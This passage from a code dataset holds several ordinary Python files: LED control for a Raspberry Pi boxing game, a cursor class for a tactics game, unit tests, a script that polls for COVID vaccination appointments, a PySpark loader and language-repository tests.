AttackColour\r\n\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\tAttackColour =0\r\n\t\t\t\t\t\t\tprint (\"Unrecognised text\", Attack.text)\r\n\t\t\t\t\t\r\n\t\t\t\t\t\tif AttackColour != 0:\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t# Set the current pixel as required by the punch sequence - use half the time to display, \r\n\t\t\t\t\t\t\t\t# half off so it is sequence can have 2 of the same in a row\r\n\t\t\t\t\t\t\t\tstrip.setPixelColor(i, PixelState[i]) # Actual strip is Green Red Blue, so swap colours around\r\n\t\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\t\ttime.sleep(CMD_FLASH_TIME/1000)\r\n\r\n\t\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\t# Set the current pixel as required by the punch sequence - use half the time to display, \r\n\t\t\t\t\t\t\t\t# half off so it is sequence can have 2 of the same in a row\r\n\t\t\t\t\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) # Actual strip is Green Red Blue, so swap colours around\r\n\r\n\t\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\telif Attack.tag == 'Wait':\r\n\t\t\t\t\t\t#print(Attack.text)\r\n\t\t\t\t\t\tfor i in range (0,16):\r\n\t\t\t\t\t\t\tAttackColour = NO_STATE_COLOUR\r\n\t\t\t\t\t\t\tPixelState[i] = AttackColour\r\n\t\t\t\t\t\t\tstrip.setPixelColor(i, PixelState[i])\r\n\t\t\t\t\t\tstrip.show()\r\n\t\t\t\t\t\tAttackWait = (int) (Attack.text) * STD_PUNCH_WAIT / 1000\r\n\t\r\n\t\t\t\t\t\ttime.sleep(AttackWait)\r\n\t\t\telif Command.tag == 'Rest':\r\n\t\t\t\t#print (Command.text)\r\n\t\t\t\tCommandWait = (int) (Command.text) * STD_PUNCH_WAIT / 1000\r\n\t\t\t\tstrip.setPixelColor(CurrentPixel, WAIT_COLOUR) # Turn pixel white when finished\r\n\t\t\t\tstrip.show()\r\n\t\t\t\ttime.sleep(CommandWait)\r\n\t\t\t\t\r\n\r\n\t\t\t\r\n\t\tstrip.setPixelColor(CurrentPixel, FINISHED_COLOUR) # Turn pixel white when finished\r\n\t\tCurrentPixel -= 1\r\n\t\tstrip.show()\r\n\t\ttime.sleep(BETWEEN_SEQ_REST/1000)\r\n\t\t\r\n\t\t# flash to tell the person to get ready\r\n\t\tstrip.setPixelColor(CurrentPixel, WAIT_COLOUR) # Turn pixel white when finished\r\n\t\tstrip.show()\r\n\t\ttime.sleep(3)\r\n\t\tstrip.setPixelColor(CurrentPixel, neopixel.Color(0,0,0)) # Turn pixel off when finished\r\n\t\tstrip.show()\r\n\t\ttime.sleep(3)\r\n\r\ndef IndicateHealthPoints(HealthPoints, Strip):\r\n\tglobal strip \r\n\t\r\n\tHealthPixels = round(HealthPoints/25)\r\n\t\r\n\tif (HealthPoints >0 and HealthPixels == 0):\r\n\t\tHealthPixels = 
1\r\n\t\r\n\tprint (HealthPoints)\r\n\tif (HealthPoints > 85):\r\n\t\tPixelColour = VERY_HEALTHY_COLOUR\r\n\telif (HealthPoints >=60 and HealthPoints <=85):\r\n\t\tPixelColour = DAMAGED_COLOUR\t\r\n\telif (HealthPoints >=0 and HealthPoints <60):\r\n\t\tPixelColour = DANGER_COLOUR\r\n\telif (HealthPoints<0):\r\n\t\tPixelColour = KO_COLOUR\r\n\t\t\r\n\tif (Strip ==0):\r\n\t\tif (PixelColour == KO_COLOUR):\r\n\t\t\tfor i in range (7, -1 ,-1):\r\n\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) \r\n\t\t\tstrip.show()\r\n\t\t\ttime.sleep(.3)\r\n\t\t\tfor i in range (7, -1 ,-1):\r\n\t\t\t\tstrip.setPixelColor(i, PixelColour) # Indicate Knock Out\r\n\t\t\t\r\n\t\t# Otherwise indicate health\r\n\t\telse:\r\n\t\t\r\n\t\t\t# Otherwise indicate health\r\n\t\t\tfor i in range (7, 7 - HealthPixels ,-1):\r\n\t\t\t\tstrip.setPixelColor(i, PixelColour) \r\n\t\t\tfor i in range (7-HealthPixels,-1 ,-1):\r\n\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) \r\n\r\n\telif (Strip ==1):\r\n\t\tif (PixelColour == KO_COLOUR):\r\n\t\t\tfor i in range (8, 16):\r\n\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) # Indicate Knock Out\r\n\t\t\tstrip.show()\r\n\t\t\ttime.sleep(.3)\r\n\t\t\tfor i in range (8, 16):\r\n\t\t\t\tstrip.setPixelColor(i, PixelColour) # Indicate Knock Out\r\n\t\telse:\t\r\n\t\t\tfor i in range (8, 8 + HealthPixels):\r\n\t\t\t\tstrip.setPixelColor(i, PixelColour) \r\n\t\t\tfor i in range (8+HealthPixels,16 ,1):\r\n\t\t\t\tstrip.setPixelColor(i, neopixel.Color(0,0,0)) # Turn pixel white when finished\r\n\r\n\tstrip.show()\r\n","repo_name":"Richard-Kirby/Raspberry-Pi-Gym","sub_path":"pi-fighter/pifighterstrip.py","file_name":"pifighterstrip.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"8182232975","text":"try:\n import GlobalConstants as GC\n import configuration as cf\n import Engine, InputManager\nexcept ImportError:\n from . import GlobalConstants as GC\n from . import configuration as cf\n from . 
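A standalone restatement of the colour banding and pixel count in IndicateHealthPoints above, with the thresholds copied from the code (>85 healthy, 60..85 damaged, 0..59 danger, below 0 knocked out):

def health_band(points):
    # Mirrors the branching in IndicateHealthPoints.
    if points > 85:
        return 'VERY_HEALTHY'
    if 60 <= points <= 85:
        return 'DAMAGED'
    if 0 <= points < 60:
        return 'DANGER'
    return 'KO'

def health_pixels(points):
    # round(points / 25), but never 0 while the fighter is still standing;
    # KO is signalled in the original by flashing the whole bar instead.
    if points <= 0:
        return 0
    return max(1, round(points / 25))

for hp in (100, 70, 10, -5):
    print(hp, health_band(hp), health_pixels(hp))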
import Engine, InputManager\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass Cursor(object):\n def __init__(self, sprite, position, fake=False):\n self.spriteName = sprite\n\n self.fake = fake\n\n self.loadSprites()\n \n self.position = position\n self.currentSelectedUnit = None\n self.secondSelectedUnit = None\n self.currentHoveredUnit = None\n self.currentHoveredTile = None\n self.camera_follow = None\n\n self.fluid_helper = InputManager.FluidScroll(cf.OPTIONS['Cursor Speed'])\n\n self.movePath = []\n\n self.drawState = 0 # If cursor will be drawn\n\n self.back_pressed = False\n self.spriteOffset = [0, 0]\n self.already_stopped_at_move_border = False # Only applies during MoveState in StateMachine\n self.border_position = None # Where the arrow stopped at the border\n \n def draw(self, surf):\n if self.drawState or self.fake: # Only draws if cursor is on\n x, y = self.position\n # The space Rect is constructed like so so as to center the cursor sprite\n topleft = x * GC.TILEWIDTH - max(0, (self.image.get_width() - 16)//2), y * GC.TILEHEIGHT - max(0, (self.image.get_height() - 16)//2)\n topleft = topleft[0] - self.spriteOffset[0], topleft[1] - self.spriteOffset[1]\n surf.blit(self.image, topleft)\n # Reset sprite offset afterwards\n num = 8 if self.back_pressed else 4\n if self.spriteOffset[0] > 0:\n self.spriteOffset[0] = max(0, self.spriteOffset[0] - num)\n elif self.spriteOffset[0] < 0:\n self.spriteOffset[0] = min(0, self.spriteOffset[0] + num)\n if self.spriteOffset[1] > 0:\n self.spriteOffset[1] = max(0, self.spriteOffset[1] - num)\n elif self.spriteOffset[1] < 0:\n self.spriteOffset[1] = min(0, self.spriteOffset[1] + num)\n\n def getHoveredUnit(self, gameStateObj):\n for unit in gameStateObj.allunits:\n if unit.position == self.position:\n return unit\n return None\n\n def init_displays(self):\n self.unit_info_disp = None\n self.tile_info_disp = None\n self.obj_info_disp = None\n\n self.unit_info_offset = 0\n self.tile_info_offset = 0\n self.obj_info_offset = 0\n\n self.remove_unit_info = True\n self.tile_left = False\n self.obj_top = False\n\n def removeSprites(self):\n self.sprite = None\n self.image = None\n self.passivesprite, self.activesprite, self.redsprite = None, None, None\n\n # Current displays\n self.init_displays()\n \n def loadSprites(self):\n # Load sprite\n self.sprite = GC.IMAGESDICT[self.spriteName]\n self.passivesprite, self.activesprite, self.redsprite, self.formationsprite = self.formatSprite(self.sprite)\n self.image = Engine.subsurface(self.passivesprite, (GC.CURSORSPRITECOUNTER.count*GC.TILEWIDTH*2, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2)) # 32*32\n\n # Current displays\n self.init_displays()\n\n def remove_unit_display(self):\n self.remove_unit_info = True\n \n def move(self, move, gameStateObj):\n dx, dy = move\n gameStateObj.allarrows = [] # Clear all arrows\n GC.SOUNDDICT['Select 5'].stop() # Play cursor sound on move\n GC.SOUNDDICT['Select 5'].play()\n x, y = self.position\n self.position = x + dx, y + dy\n if gameStateObj.highlight_manager.check_arrow(self.position):\n self.border_position = self.position\n self.place_arrows(gameStateObj)\n # Remove unit display\n self.remove_unit_display()\n # Sprite Offset -- but only if we're not traveling too fast\n if cf.OPTIONS['Cursor Speed'] >= 40:\n if self.back_pressed:\n self.spriteOffset[0] += 8*dx\n self.spriteOffset[1] += 8*dy\n else:\n self.spriteOffset[0] += 12*dx\n self.spriteOffset[1] += 12*dy\n\n def place_arrows(self, gameStateObj):\n # if gameStateObj.stateMachine.getState() == 'move' 
and gameStateObj.highlight_manager.check_arrow(self.position):\n if gameStateObj.stateMachine.getState() == 'move':\n if self.border_position:\n self.movePath = self.currentSelectedUnit.getPath(gameStateObj, self.border_position)\n else:\n self.movePath = self.currentSelectedUnit.getPath(gameStateObj, self.position)\n self.constructArrows(self.movePath[::-1], gameStateObj)\n\n # The algorithm below is all hard-coded in, which sucks, should change it later, but it WORKS, so thats good\n # ALSO IS EXTREMELY SHITTY ALGORITHM I DON'T UNDERSTAND. was found using trial and error, for the most part\n def constructArrows(self, movePath, gameStateObj):\n arrow = None\n if len(movePath) <= 1: # ie, we haven't really moved yet\n return\n for index in range(len(movePath)):\n if index == 0:\n directionTuple = (movePath[index + 1][0] - movePath[index][0], movePath[index + 1][1] - movePath[index][1])\n if directionTuple == (1, 0): # right\n arrow = ArrowObject((0, 0), movePath[index])\n elif directionTuple == (-1, 0): # left\n arrow = ArrowObject((1, 1), movePath[index])\n elif directionTuple == (0, 1): # up\n arrow = ArrowObject((0, 1), movePath[index])\n elif directionTuple == (0, -1): # down\n arrow = ArrowObject((1, 0), movePath[index])\n elif index == len(movePath) - 1:\n directionTuple = (movePath[index][0] - movePath[index - 1][0], movePath[index][1] - movePath[index - 1][1])\n if directionTuple == (1, 0):\n arrow = ArrowObject((0, 6), movePath[index])\n elif directionTuple == (-1, 0):\n arrow = ArrowObject((1, 7), movePath[index])\n elif directionTuple == (0, -1):\n arrow = ArrowObject((1, 6), movePath[index])\n elif directionTuple == (0, 1):\n arrow = ArrowObject((0, 7), movePath[index])\n else: # Neither beginning nor end of arrow\n directionTuple = (movePath[index + 1][0] - movePath[index - 1][0], movePath[index + 1][1] - movePath[index - 1][1])\n modifierTuple = (movePath[index][0] - movePath[index - 1][0], movePath[index][1] - movePath[index - 1][1])\n if directionTuple == (2, 0) or directionTuple == (-2, 0): # right or left\n arrow = ArrowObject((0, 3), movePath[index])\n elif directionTuple == (0, 2) or directionTuple == (0, -2): # up or down\n arrow = ArrowObject((0, 2), movePath[index])\n elif directionTuple == (1, -1) or directionTuple == (-1, 1):\n if modifierTuple == (0, -1) or modifierTuple == (-1, 0):\n # print \"topleft\"\n arrow = ArrowObject((0, 4), movePath[index])\n else:\n # print \"bottomright\"\n arrow = ArrowObject((1, 5), movePath[index])\n elif directionTuple == (1, 1) or directionTuple == (-1, -1):\n if modifierTuple == (0, -1) or modifierTuple == (1, 0):\n # print \"topright\"\n arrow = ArrowObject((0, 5), movePath[index])\n else: # (0, 1) is one of the modifier tuples that does here.\n # print \"bottomleft\"\n arrow = ArrowObject((1, 4), movePath[index])\n gameStateObj.allarrows.append(arrow)\n \n def handleMovement(self, gameStateObj):\n # Handle Cursor movement - Move the cursor around\n # Refuses to move Cursor if not enough time has passed since the cursor has last moved. 
This is\n # a hack to slow down cursor movement rate.\n if self.already_stopped_at_move_border: # Must click again to keep moving\n self.fluid_helper.update(gameStateObj, hold=False)\n else:\n self.fluid_helper.update(gameStateObj)\n # Back doubles speed\n gameStateObj.cameraOffset.back_pressed(self.back_pressed) # changes camera speed\n directions = self.fluid_helper.get_directions(double_speed=self.back_pressed)\n\n # This section tries to handle the case where the cursor should STOP when it reaches the units movement borders\n # However, it then needs to continue on when re-pressed\n if gameStateObj.highlight_manager.check_arrow(self.position):\n if directions:\n if ('LEFT' in directions and 'LEFT' not in gameStateObj.input_manager.key_down_events and not gameStateObj.highlight_manager.check_arrow((self.position[0] - 1, self.position[1]))) or \\\n ('RIGHT' in directions and 'RIGHT' not in gameStateObj.input_manager.key_down_events and not gameStateObj.highlight_manager.check_arrow((self.position[0] + 1, self.position[1]))) or \\\n ('UP' in directions and 'UP' not in gameStateObj.input_manager.key_down_events and not gameStateObj.highlight_manager.check_arrow((self.position[0], self.position[1] - 1))) or \\\n ('DOWN' in directions and 'DOWN' not in gameStateObj.input_manager.key_down_events and not gameStateObj.highlight_manager.check_arrow((self.position[0], self.position[1] + 1))):\n if self.already_stopped_at_move_border:\n self.already_stopped_at_move_border = False\n else:\n directions = []\n self.fluid_helper.reset() # Reset input so we don't keep going\n self.already_stopped_at_move_border = True\n else:\n self.already_stopped_at_move_border = False\n else:\n self.already_stopped_at_move_border = False\n\n # Normal movement\n if 'LEFT' in directions and self.position[0] > 0:\n self.move((-1, 0), gameStateObj)\n if self.position[0] <= gameStateObj.cameraOffset.get_x() + 2: # Cursor controls camera movement\n # Set x is move the camera. 
Move it to its x_pos - 1, cause we're moving left\n gameStateObj.cameraOffset.set_x(gameStateObj.cameraOffset.x - 1)\n elif 'RIGHT' in directions and self.position[0] < (gameStateObj.map.width - 1):\n self.move((1, 0), gameStateObj)\n if self.position[0] >= (GC.TILEX + gameStateObj.cameraOffset.get_x() - 3):\n gameStateObj.cameraOffset.set_x(gameStateObj.cameraOffset.x + 1)\n if 'UP' in directions and self.position[1] > 0:\n self.move((0, -1), gameStateObj)\n if self.position[1] <= gameStateObj.cameraOffset.get_y() + 2:\n gameStateObj.cameraOffset.set_y(gameStateObj.cameraOffset.y - 1)\n elif 'DOWN' in directions and self.position[1] < (gameStateObj.map.height - 1):\n self.move((0, 1), gameStateObj)\n if self.position[1] >= (GC.TILEY + gameStateObj.cameraOffset.get_y() - 3):\n gameStateObj.cameraOffset.set_y(gameStateObj.cameraOffset.y + 1)\n\n def setPosition(self, newposition, gameStateObj):\n if not newposition:\n return \n logger.debug('Cursor new position %s', newposition)\n self.position = newposition\n # Recenter camera\n if self.position[0] <= gameStateObj.cameraOffset.get_x() + 2: # Too far left\n gameStateObj.cameraOffset.set_x(self.position[0] - 3) # Testing...\n if self.position[0] >= (GC.TILEX + gameStateObj.cameraOffset.get_x() - 3):\n gameStateObj.cameraOffset.set_x(self.position[0] + 4 - GC.TILEX)\n if self.position[1] <= gameStateObj.cameraOffset.get_y() + 2:\n gameStateObj.cameraOffset.set_y(self.position[1] - 2)\n if self.position[1] >= (GC.TILEY + gameStateObj.cameraOffset.get_y() - 3):\n gameStateObj.cameraOffset.set_y(self.position[1] + 3 - GC.TILEY)\n # Remove unit display\n self.remove_unit_display()\n\n def forcePosition(self, newposition, gameStateObj):\n if not newposition:\n return \n logger.debug('Cursor new position %s', newposition)\n self.position = newposition\n # Recenter camera\n if self.position[0] <= gameStateObj.cameraOffset.get_x() + 2: # Too far left\n gameStateObj.cameraOffset.force_x(self.position[0] - 3) # Testing...\n if self.position[0] >= (GC.TILEX + gameStateObj.cameraOffset.get_x() - 3):\n gameStateObj.cameraOffset.force_x(self.position[0] + 4 - GC.TILEX)\n if self.position[1] <= gameStateObj.cameraOffset.get_y() + 2:\n gameStateObj.cameraOffset.force_y(self.position[1] - 2)\n if self.position[1] >= (GC.TILEY + gameStateObj.cameraOffset.get_y() - 3):\n gameStateObj.cameraOffset.force_y(self.position[1] + 3 - GC.TILEY)\n # Remove unit display\n self.remove_unit_display()\n\n def autocursor(self, gameStateObj, force=False):\n player_units = [unit for unit in gameStateObj.allunits if unit.team == 'player' and unit.position]\n lord = [unit for unit in player_units if 'Lord' in unit.tags]\n if force:\n if lord:\n self.forcePosition(lord[0].position, gameStateObj)\n elif player_units:\n self.forcePosition(player_units[0].position, gameStateObj)\n else:\n if lord:\n self.setPosition(lord[0].position, gameStateObj)\n elif player_units:\n self.setPosition(player_units[0].position, gameStateObj)\n\n def formatSprite(self, sprite):\n # Sprites are in 64 x 64 boxes\n passivesprite = Engine.subsurface(sprite, (0, 0, GC.TILEWIDTH*2*4, GC.TILEHEIGHT*2))\n redsprite = Engine.subsurface(sprite, (0, GC.TILEHEIGHT*2, GC.TILEWIDTH*2*4, GC.TILEHEIGHT*2))\n activesprite = Engine.subsurface(sprite, (0, GC.TILEHEIGHT*4, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n formationsprite = Engine.subsurface(sprite, (GC.TILEWIDTH*2*2, GC.TILEHEIGHT*4, GC.TILEWIDTH*2*2, GC.TILEHEIGHT*2))\n return passivesprite, activesprite, redsprite, formationsprite\n\n def drawPortraits(self, surf, 
gameStateObj):\n legal_states = ['free', 'prep_formation', 'prep_formation_select']\n # Unit Info handling\n if self.remove_unit_info:\n if gameStateObj.stateMachine.getState() in legal_states and self.currentHoveredUnit: # Get this \n self.remove_unit_info = False\n self.unit_info_disp = self.currentHoveredUnit.createPortrait(gameStateObj)\n self.unit_info_offset = min(self.unit_info_disp.get_width(), self.unit_info_offset)\n elif self.unit_info_disp:\n self.unit_info_offset += 20\n if self.unit_info_offset >= 200:\n self.unit_info_disp = None\n else:\n self.unit_info_offset -= 20\n self.unit_info_offset = max(0, self.unit_info_offset)\n\n # Tile Info Handling\n if gameStateObj.stateMachine.getState() in legal_states and cf.OPTIONS['Show Terrain']:\n self.tile_info_disp = gameStateObj.map.getDisplay(self.position, gameStateObj)\n if self.tile_info_disp:\n self.tile_info_offset = min(self.tile_info_disp.get_width(), self.tile_info_offset)\n self.tile_info_offset -= 20\n self.tile_info_offset = max(0, self.tile_info_offset)\n elif self.tile_info_disp:\n self.tile_info_offset += 20\n if self.tile_info_offset >= 200:\n self.tile_info_disp = None\n\n # Objective Info Handling\n if gameStateObj.stateMachine.getState() in legal_states and cf.OPTIONS['Show Objective']:\n self.obj_info_disp = gameStateObj.objective.draw(gameStateObj)\n self.obj_info_offset -= 20\n self.obj_info_offset = max(0, self.obj_info_offset)\n elif self.obj_info_disp:\n self.obj_info_offset += 20\n if self.obj_info_offset >= 200:\n self.obj_info_disp = None\n\n # === Final blitting\n # Should be in topleft, unless cursor is in topleft, in which case it should be in bottomleft\n if self.unit_info_disp:\n if self.position[1] < GC.TILEY//2 + gameStateObj.cameraOffset.get_y() and \\\n not (self.position[0] > GC.TILEX//2 + gameStateObj.cameraOffset.get_x() - 1):\n surf.blit(self.unit_info_disp, (0 - self.unit_info_offset, GC.WINHEIGHT - 0 - self.unit_info_disp.get_height()))\n else:\n surf.blit(self.unit_info_disp, (0 - self.unit_info_offset, 0))\n\n if self.tile_info_disp:\n # Should be in bottom, no matter what. 
Can be in bottomleft or bottomright, depending on where cursor is\n if self.position[0] > GC.TILEX//2 + gameStateObj.cameraOffset.get_x() - 1: # If cursor is right\n if self.tile_left:\n self.tile_left = False\n self.tile_info_offset = self.tile_info_disp.get_width()\n surf.blit(self.tile_info_disp, (5 - self.tile_info_offset, GC.WINHEIGHT - self.tile_info_disp.get_height() - 3)) # Bottomleft\n else:\n if not self.tile_left:\n self.tile_left = True\n self.tile_info_offset = self.tile_info_disp.get_width()\n pos = (GC.WINWIDTH - self.tile_info_disp.get_width() - 5 + self.tile_info_offset, GC.WINHEIGHT - self.tile_info_disp.get_height() - 3)\n surf.blit(self.tile_info_disp, pos) # Bottomright\n\n if self.obj_info_disp:\n # Should be in topright, unless the cursor is in the topright\n # TopRight - I believe this has RIGHT precedence\n if self.position[1] < GC.TILEY//2 + gameStateObj.cameraOffset.get_y() and \\\n gameStateObj.cursor.position[0] > GC.TILEX//2 + gameStateObj.cameraOffset.get_x() - 1:\n # Gotta place in bottomright, because cursor is in topright\n if self.obj_top:\n self.obj_top = False\n self.obj_info_offset = self.obj_info_disp.get_width()\n pos = (GC.WINWIDTH - GC.TILEWIDTH//4 + self.obj_info_offset - self.obj_info_disp.get_width(), \n GC.WINHEIGHT - GC.TILEHEIGHT//4 - self.obj_info_disp.get_height())\n surf.blit(self.obj_info_disp, pos) # Should be bottom right\n else:\n # Place in topright\n if not self.obj_top:\n self.obj_top = True\n self.obj_info_offset = self.obj_info_disp.get_width()\n surf.blit(self.obj_info_disp, (GC.WINWIDTH - GC.TILEWIDTH//4 + self.obj_info_offset - self.obj_info_disp.get_width(), 1))\n\n def take_input(self, eventList, gameStateObj):\n if not self.fake:\n self.handleMovement(gameStateObj)\n\n def update(self, gameStateObj):\n self.currentHoveredUnit = gameStateObj.grid_manager.get_unit_node(self.position)\n\n if not self.drawState:\n self.remove_unit_display()\n\n self.fluid_helper.update_speed(cf.OPTIONS['Cursor Speed'])\n\n if gameStateObj.stateMachine.getState() == 'prep_formation_select':\n if 'Formation' in gameStateObj.map.tile_info_dict[self.position]:\n self.image = Engine.subsurface(self.formationsprite, (0, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n else:\n self.image = Engine.subsurface(self.formationsprite, (GC.CURSORSPRITECOUNTER.count//2*GC.TILEWIDTH*2, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n elif self.drawState == 2 and gameStateObj.stateMachine.getState() != 'dialogue': # Red if it is selecting...\n self.image = Engine.subsurface(self.redsprite, (GC.CURSORSPRITECOUNTER.count*GC.TILEWIDTH*2, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n elif self.currentHoveredUnit and self.currentHoveredUnit.team == 'player' and \\\n not self.currentHoveredUnit.isDone() and gameStateObj.stateMachine.getState() != 'dialogue':\n self.image = self.activesprite\n else:\n self.image = Engine.subsurface(self.passivesprite, (GC.CURSORSPRITECOUNTER.count*GC.TILEWIDTH*2, 0, GC.TILEWIDTH*2, GC.TILEHEIGHT*2))\n\n# === GENERIC ARROW OBJECT ===================================================\nclass ArrowObject(object):\n sprite = GC.IMAGESDICT['MovementArrows']\n\n def __init__(self, index, position):\n rindex, cindex = index\n left = 1 + ((GC.TILEWIDTH + 2)*cindex) + cindex//2\n top = 1 + ((GC.TILEHEIGHT + 2)*rindex)\n self.image = Engine.subsurface(self.sprite, (left, top, GC.TILEWIDTH, GC.TILEHEIGHT))\n self.position = position\n\n def draw(self, surf):\n x, y = self.position\n topleft = x * GC.TILEWIDTH, y * GC.TILEHEIGHT\n surf.blit(self.image, 
topleft)\n","repo_name":"Wiggeh/Fire-Emblem-Custom-Project","sub_path":"Project and Game Files/Code/Cursor.py","file_name":"Cursor.py","file_ext":"py","file_size_in_byte":21380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17418111126","text":"from mouffet.utils import common_utils\n\n\ndef test_dict_update():\n a = {\"a\": 1, \"b\": 2, \"c\": {\"a\": 1, \"b\": 2}}\n b = {\"a\": 3, \"c\": {\"b\": 3}}\n res = {\"a\": 3, \"b\": 2, \"c\": {\"a\": 1, \"b\": 3}}\n assert common_utils.deep_dict_update(a, b) == res\n\n\ndef test_dict_update_nocopy():\n a = {\"a\": 1, \"b\": 2, \"c\": {\"a\": 1, \"b\": 2}}\n b = {\"a\": 3, \"c\": {\"b\": 3}}\n tmp = common_utils.deep_dict_update(a, b)\n tmp[\"b\"] = 4\n res = {\"a\": 3, \"b\": 4, \"c\": {\"a\": 1, \"b\": 3}}\n assert a == res\n\n\ndef test_dict_update_copy():\n a = {\"a\": 1, \"b\": 2, \"c\": {\"a\": 1, \"b\": 2}}\n b = {\"a\": 3, \"c\": {\"b\": 3}}\n tmp = common_utils.deep_dict_update(a, b, copy=True)\n tmp[\"b\"] = 4\n res = {\"a\": 3, \"b\": 4, \"c\": {\"a\": 1, \"b\": 3}}\n assert a != res\n","repo_name":"Vin985/mouffet","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"22649811510","text":"\r\nimport urllib.request\r\nimport json\r\nimport time\r\nimport webbrowser\r\nimport winsound\r\n\r\n#url_db = 'https://kn.mednet.de/api/express/covid/testreihen/all?praxis_id=10' #Testdaten\r\nurl_db = 'https://kn.mednet.de/api/express/covid/testreihen/all?praxis_id=17'\r\nurl_termin = 'https://kn.mednet.de/covid19/signup/?praxis=MVZ%20Birkenallee'\r\n\r\ndef main(): \r\n\r\n piep()\r\n\r\n while 1:\r\n if (check_termin() == False):\r\n time.sleep(60 * 1)\r\n else:\r\n webbrowser.open(url_termin)\r\n while (check_termin() != False):\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n piep()\r\n time.sleep(5)\r\n \r\n\r\ndef check_termin():\r\n page = urllib.request.urlopen(url_db)\r\n data = page.read()\r\n\r\n places = find_values('slots_left', data)\r\n\r\n print( time.strftime(\"%d.%m.%Y %H:%M:%S\") , places)\r\n\r\n for index, item in enumerate(places):\r\n if item > 0:\r\n print (\"Freie Termine:\", item, \"Termin Nr:\", index) \r\n return index, item\r\n\r\n return False\r\n\r\ndef find_values(id, json_repr):\r\n results = []\r\n\r\n def _decode_dict(a_dict):\r\n try:\r\n results.append(a_dict[id])\r\n except KeyError:\r\n pass\r\n return a_dict\r\n\r\n json.loads(json_repr, object_hook=_decode_dict) # Return value ignored.\r\n return results\r\n\r\ndef piep():\r\n frequency = 3700 # Set Frequency To 2500 Hertz\r\n duration = 1000 # Set Duration To 1000 ms == 1 second\r\n winsound.Beep(frequency, duration)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n","repo_name":"cordesmich/corona-termine","sub_path":"corona-impfung-papenburg.py","file_name":"corona-impfung-papenburg.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36006223761","text":"import numpy as np\r\nfrom pyspark.sql import SparkSession\r\n\r\nspark = SparkSession.builder.appName(\"processer\").getOrCreate()\r\n\r\ncols_to_keep = ['site', 'site_id', 'subsite', 'subsite_id', 'depth', 'parameter', 'lat', 'lon', 'gbrmpa_reef_id', 'time', 'cal_val', 
'qc_val', 'qc_flag']\r\n\r\ndf = spark.read.csv(\"short.csv\", header=True)\r\n\r\ndf = df.select(cols_to_keep)\r\n\r\ndf.show(5)\r\n","repo_name":"SoroushSemer/Predicting-Coral-Reef-Bleaching","sub_path":"preprocess tempurature data/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10387371235","text":"from typing import Any, ClassVar\nfrom unittest.mock import MagicMock, patch\n\nfrom google.cloud.datastore import Client, Entity\n\nfrom pdf_bot.consts import LANGUAGE\nfrom pdf_bot.language import LanguageRepository\n\n\nclass TestLanguageRepository:\n USER_ID = 0\n LANGUAGE_CODE = \"lang_code\"\n USER_ENTITY_DICT: ClassVar[dict[str, str]] = {LANGUAGE: LANGUAGE_CODE}\n\n def setup_method(self) -> None:\n self.user_entity = MagicMock(spec=Entity)\n self.db_client = MagicMock(spec=Client)\n\n self.sut = LanguageRepository(self.db_client)\n\n def test_get_language(self) -> None:\n self._mock_user_entity_dict()\n self.db_client.get.return_value = self.user_entity\n\n actual = self.sut.get_language(self.USER_ID)\n\n assert actual == self.LANGUAGE_CODE\n\n def test_get_language_without_user(self) -> None:\n self.db_client.get.return_value = None\n actual = self.sut.get_language(self.USER_ID)\n assert actual == self.sut.EN_GB_CODE\n\n def test_get_language_and_language_not_set(self) -> None:\n self.db_client.get.return_value = self.user_entity\n actual = self.sut.get_language(self.USER_ID)\n assert actual == self.sut.EN_GB_CODE\n\n def test_get_language_legacy_en_code(self) -> None:\n user_entity_dict = {LANGUAGE: \"en\"}\n self._mock_user_entity_dict(user_entity_dict)\n self.db_client.get.return_value = self.user_entity\n\n actual = self.sut.get_language(self.USER_ID)\n\n assert actual == self.sut.EN_GB_CODE\n\n def test_upsert_language(self) -> None:\n self.db_client.get.return_value = self.user_entity\n\n self.sut.upsert_language(self.USER_ID, self.LANGUAGE_CODE)\n\n self.user_entity.__setitem__.assert_called_with(LANGUAGE, self.LANGUAGE_CODE)\n self.db_client.put.assert_called_once_with(self.user_entity)\n\n def test_upsert_language_without_user(self) -> None:\n self.db_client.get.return_value = None\n\n with patch(\"pdf_bot.language.language_repository.Entity\") as entity_cls:\n entity_cls.return_value = self.user_entity\n self.sut.upsert_language(self.USER_ID, self.LANGUAGE_CODE)\n\n entity_cls.assert_called_once()\n self.user_entity.__setitem__.assert_called_with(LANGUAGE, self.LANGUAGE_CODE)\n self.db_client.put.assert_called_once_with(self.user_entity)\n\n def _mock_user_entity_dict(self, user_entity_dict: dict[str, Any] | None = None) -> 